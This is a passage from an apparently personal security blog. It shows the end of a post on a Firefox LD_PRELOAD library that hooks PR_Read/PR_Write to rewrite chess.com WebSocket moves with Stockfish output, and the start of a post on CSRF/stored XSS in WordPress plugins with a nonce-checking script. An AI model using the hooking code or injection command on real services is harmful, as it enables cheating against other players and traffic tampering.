<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">retVal</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">PRInt32</span><span class="w"> </span><span class="nf">PR_Read</span><span class="p">(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">amount</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_read</span><span class="p">)(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * There is a hell of a lot data that passes through this function. Hence we only want</span>
<span class="cm"> * to consume as few as possible processing power. We are only interested in data that</span>
<span class="cm"> * is in a specfic length range, since it seems that the WebSocket packets on live.chess.com</span>
<span class="cm"> * use pretty regular packet size.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * Sniff for incoming live.chess.com WebSocket move data.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"moves"</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">couldRead</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">collectGameState</span><span class="p">((</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
<span class="cp">#if DEBUG_LEVEL >= 2</span>
<span class="w"> </span><span class="n">INFO_PRINT</span><span class="p">(</span><span class="s">"PR_Read() called with 'moves' keyword inside"</span><span class="p">,</span><span class="w"> </span><span class="n">SH_BLUE</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">my_PR_read</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span><span class="w"> </span><span class="s">"PR_Read"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">my_PR_read</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"dlsym() failed for PR_Write</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">retVal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_read</span><span class="p">)(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">retVal</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>I hope the above code is more or less self explanatory. But in case it's
not, here's a short summary of the rough algorithm that it computes:</p>
<p><strong>1.</strong> The shared library (let's call it libpwh.so) is dynamically
loaded in a firefox process with the LD_PRELOAD trick. For instance:
<code>export LD_PRELOAD=$PWD/libpwh.so; /usr/bin/firefox</code><br>
<strong>2.</strong> The functions <code>PR_Read()</code> and <code>PR_Write()</code> are hooked.<br>
<strong>3.</strong> As soon as a WebSocket request that indicates the beginning of a
new live.chess.com chess game is detected, the shared library (the above
code) initializes the <a href="http://stockfishchess.org/" title="chess engine">local Stockfish chess
engine</a> with the function
<em>int initStockfish()</em> {There should be enough time before the game
actually begins to pre-calculate some moves}.<br>
<strong>3.1</strong> When a JSON message like the following</p>
<div class="highlight"><pre><span></span><code><span class="p">[{</span><span class="nt">"data"</span><span class="p">:{</span><span class="nt">"sid"</span><span class="p">:</span><span class="s2">"gserv"</span><span class="p">,</span><span class="nt">"game"</span><span class="p">:{</span><span class="nt">"id"</span><span class="p">:</span><span class="mi">706548893</span><span class="p">,</span><span class="nt">"status"</span><span class="p">:</span><span class="s2">"starting"</span><span class="p">,</span><span class="nt">"seq"</span><span class="p">:</span><span class="mi">0</span><span class="p">,</span><span class="nt">"players"</span><span class="p">:[{</span><span class="nt">"uid"</span><span class="p">:</span><span class="s2">"rocchen"</span><span class="p">,</span><span class="nt">"status"</span><span class="p">:</span><span class="s2">"playing"</span><span class="p">,</span><span class="nt">"lag"</span><span class="p">:</span><span class="mi">4</span><span class="p">,</span><span class="nt">"lagms"</span><span class="p">:</span><span class="mi">415</span><span class="p">,</span><span class="nt">"gid"</span><span class="p">:</span><span class="mi">706548893</span><span class="p">},{</span><span class="nt">"uid"</span><span class="p">:</span><span class="s2">"workcentre7328"</span><span class="p">,</span><span class="nt">"status"</span><span class="p">:</span><span class="s2">"playing"</span><span class="p">,</span><span class="nt">"lag"</span><span class="p">:</span><span class="mi">2</span><span class="p">,</span><span class="nt">"lagms"</span><span class="p">:</span><span class="mi">210</span><span class="p">,</span><span class="nt">"gid"</span><span class="p">:</span><span class="mi">706548893</span><span class="p">}],</span><span class="nt">"abortable"</span><span class="p">:[</span><span class="kc">true</span><span class="p">,</span><span class="kc">true</span><span class="p">],</span><span class="nt">"moves"</span><span class="p">:</span><span class="s2">""</span><span class="p">,</span><span class="nt">"clocks"</span><span class="p">:[</span><span class="mi">600</span><span class="p">,</span><span class="mi">600</span><span class="p">],</span><span class="nt">"draws"</span><span class="p">:[],</span><span class="nt">"repeated"</span><span class="p">:</span><span class="kc">true</span><span class="p">,</span><span class="nt">"squares"</span><span class="p">:[</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">]},</span><span class="nt">"tid"</span><span class="p">:</span><span class="s2">"GameState"</span><span class="p">},</span><span class="nt">"channel"</span><span class="p">:</span><span class="s2">"/game/706548893"</span><span class="p">}]</span><span class="w"></span>
</code></pre></div>
<p>is intercepted, a game has begun. The needles that indicate such a
beginning are thus the players UID and the string <em>"status":"starting"</em><br>
<strong>4.</strong> From now on, every outgoing packet (from <code>PR_Write()</code>), that
causes a move, must be updated with a chess engine move. This is done
with with function void <code>modifyMove()</code>, which in turns relies on a
correct game state. Such a outbound packet looks like (We have discussed
the protocol in the previous chapter):</p>
<div class="highlight"><pre><span></span><code><span class="p">[{</span><span class="nt">"channel"</span><span class="p">:</span><span class="s2">"/service/user"</span><span class="p">,</span><span class="nt">"data"</span><span class="p">:{</span><span class="nt">"move"</span><span class="p">:{</span><span class="nt">"gid"</span><span class="p">:</span><span class="mi">706662190</span><span class="p">,</span><span class="nt">"seq"</span><span class="p">:</span><span class="mi">11</span><span class="p">,</span><span class="nt">"uid"</span><span class="p">:</span><span class="s2">"rocchen"</span><span class="p">,</span><span class="nt">"move"</span><span class="p">:</span><span class="s2">"9I"</span><span class="p">,</span><span class="nt">"clock"</span><span class="p">:</span><span class="mi">76</span><span class="p">,</span><span class="nt">"clockms"</span><span class="p">:</span><span class="mi">7661</span><span class="p">,</span><span class="nt">"squared"</span><span class="p">:</span><span class="kc">false</span><span class="p">},</span><span class="nt">"sid"</span><span class="p">:</span><span class="s2">"gserv"</span><span class="p">,</span><span class="nt">"tid"</span><span class="p">:</span><span class="s2">"Move"</span><span class="p">},</span><span class="nt">"id"</span><span class="p">:</span><span class="s2">"105"</span><span class="p">,</span><span class="nt">"clientId"</span><span class="p">:</span><span class="s2">"4gzikii6gu01a1k7kvdcb7a1h2gh6"</span><span class="p">}]</span><span class="w"></span>
</code></pre></div>
<p><strong>5.</strong> Concurrently to step 4, the move made by the opponent is
synchronized with a local gameState struct variable. The opponent's move
is obtained in <code>PR_Read()</code> and the function void <em>collectGameState()</em>
keeps the move history current. The function <em>collectGameState()</em> also
stores the current game state in a C struct:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// This struct holds the current game state and all kids of game information as parsed and extracted of the live session</span>
<span class="k">typedef</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">status</span><span class="p">[</span><span class="mh">0x50</span><span class="p">];</span><span class="w"> </span><span class="c1">// The status as defined by the protocol. Will be most likely 'playing' during a game.</span>
<span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">gameID</span><span class="p">;</span><span class="w"> </span><span class="c1">// The global game id. Can be looked up after games to review the game.</span>
<span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="n">moveNumber</span><span class="p">;</span><span class="w"> </span><span class="c1">// The number of moves I did</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">playerName</span><span class="p">[</span><span class="mh">0x50</span><span class="p">];</span><span class="w"> </span><span class="c1">// Me</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">opponentPlayerName</span><span class="p">[</span><span class="mh">0x50</span><span class="p">];</span><span class="w"> </span><span class="c1">// Poor opponent</span>
<span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">remainingTimeMsSelf</span><span class="p">;</span><span class="w"> </span><span class="c1">// yeah does that matter?</span>
<span class="w"> </span><span class="kt">uint64_t</span><span class="w"> </span><span class="n">remainingTimeMsOpponent</span><span class="p">;</span><span class="w"> </span><span class="c1">// probably more relevant</span>
<span class="w"> </span><span class="kt">uint16_t</span><span class="w"> </span><span class="n">lagMsSelf</span><span class="p">;</span><span class="w"> </span><span class="c1">// i have a stupid connection here in my house</span>
<span class="w"> </span><span class="kt">uint16_t</span><span class="w"> </span><span class="n">lagMsOpponent</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">movesMade</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span><span class="w"> </span><span class="c1">// in live.chess.com encoded version</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">movesMadeDecoded</span><span class="p">[</span><span class="mh">0x400</span><span class="p">];</span><span class="w"> </span><span class="c1">// the decoded version</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveOpponent</span><span class="p">[</span><span class="mh">0x3</span><span class="p">];</span><span class="w"> </span><span class="c1">// last move of opponent</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveSelf</span><span class="p">[</span><span class="mh">0x3</span><span class="p">];</span><span class="w"> </span><span class="c1">// my last move</span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveOpponentDecoded</span><span class="p">[</span><span class="mh">0x6</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">currentMoveSelfDecoded</span><span class="p">[</span><span class="mh">0x6</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">engineMoves</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">engineSuggestion</span><span class="p">[</span><span class="mh">0x6</span><span class="p">];</span><span class="w"> </span><span class="c1">// The best move as suggested by the engine</span>
<span class="p">}</span><span class="w"> </span><span class="n">_CHESS_COM_GAME_SESSION_STATE</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
<h3 id="chap_concl">Conclusion</h3>
<p>Hooking is a dirty business and it's not the good idea I thought it was.
Therefore my idea was rather average and the implementation is pretty
bad. All in all, I am still satisfied, because it works!</p>
<p>It would be a probably good approach if I managed to hook directly into
<a href="http://mxr.mozilla.org/mozilla-central/source/netwerk/protocol/websocket/WebSocketChannel.cpp">WebSocketChannel.cpp</a>,
because I wouldn't need to cumbersomly pick my target messages in the
huge traffic that flows thourgh <code>PR_Read()</code>.</p>
<p>It's a really strange bot to use, because while my bot modifies packets,
<strong>the javascript frontend can't properly deal with this fact and in
displays a huge mess!</strong> This is really interesting because the frontend
(in flash and javascript) notes that I made a specific move and saves it
accordingly in their variables/objects, but suddenly the game server
says that I made in reality atotally different move (The one which was
injected by my code). So the poor frontend is heavily confused and
sometimes needs up to 10 moves to update the <em>real</em> moves into the
frontend browser window. You can observe this behaviour in the video.
It's really funny!</p>
<p>To be honest, my bot has still many open issues and sometimes the
firefox process crashes randomly. Maybe there's a memory leak somewhere,
because after several games someone eats up the whole heap and the whole
linux system crashes.</p>
<p>I am pretty sure it's not my malloc/calloc, because I strictly checked
to free() all allocated buffers. But on the other hand, I must be the
culprit, because without me hooking into firefox, everything works like
a charm.</p>
<p>Either I am to inexperienced or it <em>just is</em> hard, but I think making a
click bot (as discussed above) for browser games it a far better
approach, if the case you're strictly result oriented :)</p>
<h3 id="chap_demo">Demonstration videos</h3>
<p>These two videos are of slightly low quality, but you can still
comfortably recolonize the chess game:</p>
<!-- This version of the embed code is no longer supported. Learn more: https://vimeo.com/s/tnm -->
<object width="500" height="281">
<param name="allowfullscreen" value="true"></param><param name="allowscriptaccess" value="always"></param><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=85060026&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0"></param>
<embed src="http://vimeo.com/moogaloop.swf?clip_id=85060026&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="500" height="281">
</embed>
</object>
<!-- This version of the embed code is no longer supported. Learn more: https://vimeo.com/s/tnm -->
<object width="500" height="281">
<param name="allowfullscreen" value="true"></param><param name="allowscriptaccess" value="always"></param><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=85083958&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0"></param>
<embed src="http://vimeo.com/moogaloop.swf?clip_id=85083958&force_embed=1&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=00adef&fullscreen=1&autoplay=0&loop=0" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="500" height="281">
</embed>
</object>
<p><strong>Please note the following to understand the video</strong>:
I make random moves with the king. They are <em>not actually being submitted</em> to the
server, they are just shown so in the client side interface (That what
you can see in the browser). <strong>The real moves are updated and modified
by the Stockfish engine and then injected into the WebSocket messages.</strong>
That's also the reason sometimes the chessboard suddenly updates,
because the client side GUI recognizes that it showed the <em>false</em> moves.
Then you can see the real moves for a second again.
ou can see the real moves for a second again.</p>Exploiting wordpress plugins through admin options (No 3. — Easy Media Gallery stored XSS)2013-12-17T12:16:00+01:002013-12-17T12:16:00+01:00Nikolai Tschachertag:incolumitas.com,2013-12-17:/2013/12/17/exploiting-wordpress-plugins-using-insecure-admin-forms-no-3-example-exploit-included/<h3>Preface</h3>
<p>This post is about general security weaknesses in wordpress plugins,
that allow malicious attackers to gain code execution access on the web
server (which is quite often the user www-data). To outline the problem
shortly: Often, wordpress plugins need a administration form to handle
settings and options. These options are meant to be exclusively
alterable by the admin of the wordpress site. But unfortunately, lots of
wordpress plugins suffer from a very dangerous combination of
<a href="http://epiqo.com/en/all-your-pants-are-danger-csrf-explained" title="CSRF explained">CSRF</a>
and stored XSS vulnerabilities, that wrapped up in a social engineering
approach, may break the site.</p>
<p>I have done some research in the past about such attacks. You can read
about a <a href="http://incolumitas.com/2013/07/27/no-2-flash-album-gallery-persistent-xss-exploitet-with-help-of-xsrf-leading-to-remote-code-execution-k/" title="stored xss in flash album gallery">stored xss in flash album gallery
plugin</a>
as well as my findings about a similar flaw in the <a href="http://incolumitas.com/2013/03/15/no-1-wp-members-interesting-peristant-xss-leading-to-remote-code-execution/">wp members
plugin</a>.</p>
<h3>How does the attack vector look like?</h3>
<p>First we need to understand how administration menus are created in
wordpress, because these forms are the point where data flows into a
application. You can learn more about the underlying concept on
<a href="http://codex.wordpress.org/Administration_Menus" title="administration menues in wordpress">wordpress
codex</a>.</p>
<p>But the crucial point to understand is, that they all consist of forms,
independently of the fact that you can pack your options under a
predefined and already …</p><h3>Preface</h3>
<p>This post is about general security weaknesses in wordpress plugins,
that allow malicious attackers to gain code execution access on the web
server (which is quite often the user www-data). To outline the problem
shortly: Often, wordpress plugins need a administration form to handle
settings and options. These options are meant to be exclusively
alterable by the admin of the wordpress site. But unfortunately, lots of
wordpress plugins suffer from a very dangerous combination of
<a href="http://epiqo.com/en/all-your-pants-are-danger-csrf-explained" title="CSRF explained">CSRF</a>
and stored XSS vulnerabilities, that wrapped up in a social engineering
approach, may break the site.</p>
<p>I have done some research in the past about such attacks. You can read
about a <a href="http://incolumitas.com/2013/07/27/no-2-flash-album-gallery-persistent-xss-exploitet-with-help-of-xsrf-leading-to-remote-code-execution-k/" title="stored xss in flash album gallery">stored xss in flash album gallery
plugin</a>
as well as my findings about a similar flaw in the <a href="http://incolumitas.com/2013/03/15/no-1-wp-members-interesting-peristant-xss-leading-to-remote-code-execution/">wp members
plugin</a>.</p>
<h3>How does the attack vector look like?</h3>
<p>First we need to understand how administration menus are created in
wordpress, because these forms are the point where data flows into a
application. You can learn more about the underlying concept on
<a href="http://codex.wordpress.org/Administration_Menus" title="administration menues in wordpress">wordpress
codex</a>.</p>
<p>But the crucial point to understand is, that they all consist of forms,
independently of the fact that you can pack your options under a
predefined and already existing top level menu like <em>Tools</em> or
<em>Settings</em>, or that you can create your own top level menu with a call
to
<a href="http://codex.wordpress.org/Function_Reference/add_menu_page" title="add_menu_page function">add_menu_page()</a>.<br>
In either way, you are going to populate your new menu with one or more
forms. Wordpress tries to indicate the general direction for the best
practices with the <a href="http://codex.wordpress.org/Settings_API" title="the wordpress settings API">settings
API</a>.
The API basically implements security checks (nonces to be specific) for
the forms and avoids a lot of complex debugging of the underlying
options management (no need to tinker with databases).<br>
In particular, the security checks prevent
<a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">CSRF</a> attacks
by including a <a href="http://en.wikipedia.org/wiki/Cryptographic_nonce">nonce</a>
sent with any request. Such a form with nonces would look like the
following (The example shows the beginning of the general sub-level menu
form from the <em>Settings</em> top-level menu):</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">form</span> <span class="na">method</span><span class="o">=</span><span class="s">"post"</span> <span class="na">action</span><span class="o">=</span><span class="s">"options.php"</span><span class="p">></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">'hidden'</span> <span class="na">name</span><span class="o">=</span><span class="s">'option_page'</span> <span class="na">value</span><span class="o">=</span><span class="s">'general'</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"action"</span> <span class="na">value</span><span class="o">=</span><span class="s">"update"</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">id</span><span class="o">=</span><span class="s">"_wpnonce"</span> <span class="na">name</span><span class="o">=</span><span class="s">"_wpnonce"</span> <span class="na">value</span><span class="o">=</span><span class="s">"aa07348d33"</span> <span class="p">/><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"_wp_http_referer"</span> <span class="na">value</span><span class="o">=</span><span class="s">"/~nikolai/wordpress_pentest/wordpress/wp-admin/options-general.php"</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">table</span> <span class="na">class</span><span class="o">=</span><span class="s">"form-table"</span><span class="p">></span>
[...]
<span class="p"></</span><span class="nt">table</span><span class="p">></span>
</code></pre></div>
<p>So any attacker that now tries to fool a victim into executing a
specific action by submitting a form, needs to know the nonces value.
But she certainly can't know this nonce, because it was created randomly
while generating the form in the first place. Hence without a valid
nonce, wordpress denies the processing of any action associated with the
form data.</p>
<p>Now there wouldn't be any problem at all, if every form was protected
with nonces. But wait a second. After reading yet another <a href="http://codex.wordpress.org/WordPress_Nonces" title="wp nonces">codex page
about nonces</a>,
we can begin asking ourselves questions: Is adding nonces actually
enough to secure actions?</p>
<p>No, of course it's not enough. You also need to verify them. It may be
obvious for people who know how CSRF attacks works, but I saw quite some
plugins where forms were equipped with nonce creation functions like
<em>wp_create_nonce()</em>, <em>wp_nonce_field()</em> or <em>wp_nonce_url()</em> but
the associated action just wasn't verified for validity with the
corresponding functions <em>check_admin_referer()</em>,
<em>check_ajax_referer()</em> or <em>wp_verify_nonce()</em>.</p>
<p>Some months ago, I made a quick python script that extracts all calls to
nonce creation functions and simply checks whether there is a respective
call to a nonce verification function. If there's not, there might be a
CSRF vulnerability.</p>
<div class="highlight"><pre><span></span><code><span class="n">__author__</span> <span class="o">=</span> <span class="s1">'nikolai tschacher'</span>
<span class="c1"># Unfinished.</span>
<span class="c1"># Idea: Maybe use a lexer/tokenizer to process PHP function signatures. But it still remains a really tough task</span>
<span class="c1"># to verify if a nonce with a specific action get's verified or not. One approach is to look for the $action string.</span>
<span class="c1"># But we're screwed if this string is created dynamically in a expression and is not a simple string literal.</span>
<span class="c1"># Simple idea: Just *count* all nonce creation functions and all nonce verification functions. If there there a less</span>
<span class="c1"># of the latter, actions might be unverified and thus vulnerable to CSRF attacks.</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">argparse</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="c1"># stores all action strings to nonce creation function like:</span>
<span class="c1"># - wp_nonce_url( $actionurl, $action = -1, $name = '_wpnonce' )</span>
<span class="c1"># - wp_nonce_field( $action = -1, $name = "_wpnonce", $referer = true , $echo = true )</span>
<span class="c1"># - wp_create_nonce( $action = -1 )</span>
<span class="c1"># The appropriate regex. This is quite harsh to do correctly since you essentially need to parse a PHP function call signature</span>
<span class="c1"># with some plain regexes...</span>
<span class="n">nonces_created</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">NONCE_CREATION_FUNCTIONS</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'''(wp_nonce_url|wp_nonce_field|wp_create_nonce)s*(s*(s*$actions*=s*)?("|')s*w*s*("|')s*)'''</span><span class="p">)</span>
<span class="n">COUNT_NONCE_CF</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">''</span><span class="p">)</span>
<span class="c1"># holds all nonce verification functions as:</span>
<span class="c1"># - wp_verify_nonce( $nonce, $action = -1 )</span>
<span class="c1"># - check_admin_referer( $action = -1, $query_arg = '_wpnonce' )</span>
<span class="c1"># - check_ajax_referer( $action = -1, $query_arg = false, $die = true )</span>
<span class="n">nonces_verified</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">walk_plugin_files</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">callback</span><span class="p">):</span>
<span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirs</span><span class="p">,</span> <span class="n">files</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
<span class="k">for</span> <span class="n">file</span> <span class="ow">in</span> <span class="n">files</span><span class="p">:</span>
<span class="k">if</span> <span class="n">file</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'.php'</span><span class="p">):</span>
<span class="n">callback</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">file</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">collect_nonces</span><span class="p">(</span><span class="n">file</span><span class="p">):</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fd</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">nonces_created</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">m</span><span class="o">.</span><span class="n">group</span><span class="p">()</span> <span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="n">NONCE_CREATION_FUNCTIONS</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">fd</span><span class="o">.</span><span class="n">read</span><span class="p">())])</span>
<span class="k">except</span> <span class="ne">UnicodeDecodeError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">def</span> <span class="nf">verify_nonces</span><span class="p">(</span><span class="n">file</span><span class="p">):</span>
<span class="k">pass</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="o">.</span><span class="n">ArgumentParser</span><span class="p">()</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'plugin_path'</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s2">"the path to a wordpress plugin that should be checked for CSRF"</span><span class="p">,</span>
<span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">)</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span>
<span class="c1"># First collect all occurrences of nonces</span>
<span class="n">walk_plugin_files</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">plugin_path</span><span class="p">,</span> <span class="n">collect_nonces</span><span class="p">)</span>
<span class="c1"># And then try do check whether nonces are also checked before an action</span>
<span class="n">walk_plugin_files</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">plugin_path</span><span class="p">,</span> <span class="n">verify_nonces</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">nonces_created</span><span class="p">)</span>
</code></pre></div>
<h3>Where's the problem then?</h3>
<p>Nowhere and everywhere ;)</p>
<p>Although the security architecture in the wordpress core seems to be
okay (As far as I can judge it - Honestly I didn't really dig <em>deep
enough</em> to find potential flaws), a lot of missing functionality that
the slim wordpress core lacks, can be enhanced by adding plugins.<br>
Furthermore, it's a unfortunate fact, that a lot of plugin authors tend
to be unaware of the many possibilities to blunder in security critical
code (Myself included - Writing about web security and programming
completely flawless is not exclusive apparently).<br>
And that is exactly the root of all evil: Although we can give security
unaware programmers plenty of good concepts and tools (Like the settings
API or this <a href="http://codex.wordpress.org/Data_Validation" title="data validation in wordpress">codex
article</a>)
and they will still fail to manufacture solid and found plugin code.</p>
<h3>Can we force plugin coders to program more securely</h3>
<p>I think we can. For instance, we could force plugin authors to provide
nonces for all forms that they create, regardless of the nature of the
action itself (I mean, are there cases where nonces would be
counterproductive or even annoying?). Additionally, we need to enforce
that for every nonce created, there must be a function such as</p>
<ul>
<li><em>wp_verify_nonce( $nonce, $action = -1 )</em></li>
<li><em>check_admin_referer( $action = -1, $query_arg = '_wpnonce' )</em></li>
<li><em>check_ajax_referer( $action = -1, $query_arg = false, $die =
true )</em></li>
</ul>
<p>that verfies that the action stemmed from the intended origin.</p>
<p>I can already hear people cry that there is no way to force people to
write secure programs. But in my oppinion, there are general guidelines
that at least prevent some common security problems. And hell: Wordpress
plugins really suffer from the combined threat of XSS and CSRF!</p>
<h3>A concrete example — Stored XSS in Easy Media Gallery</h3>
<p>Right at the start some information about the plugin:</p>
<ul>
<li>Plugin name: Easy Media Gallery</li>
<li><a href="http://wordpress.org/plugins/easy-media-gallery/" title="easy media gallery">Plugin
URL</a></li>
<li>Vendor: <a href="http://ghozylab.com/" title="ghozylab">Ghozylab</a></li>
<li>Vulnerable version:
<a href="http://wordpress.org/plugins/easy-media-gallery/developers/">1.2.25</a></li>
<li>Downloads: 124,042</li>
</ul>
<p>I didn't need to dig deep to find a very critical security vulnerability
in the Easy Media Gallery plugin. In the file
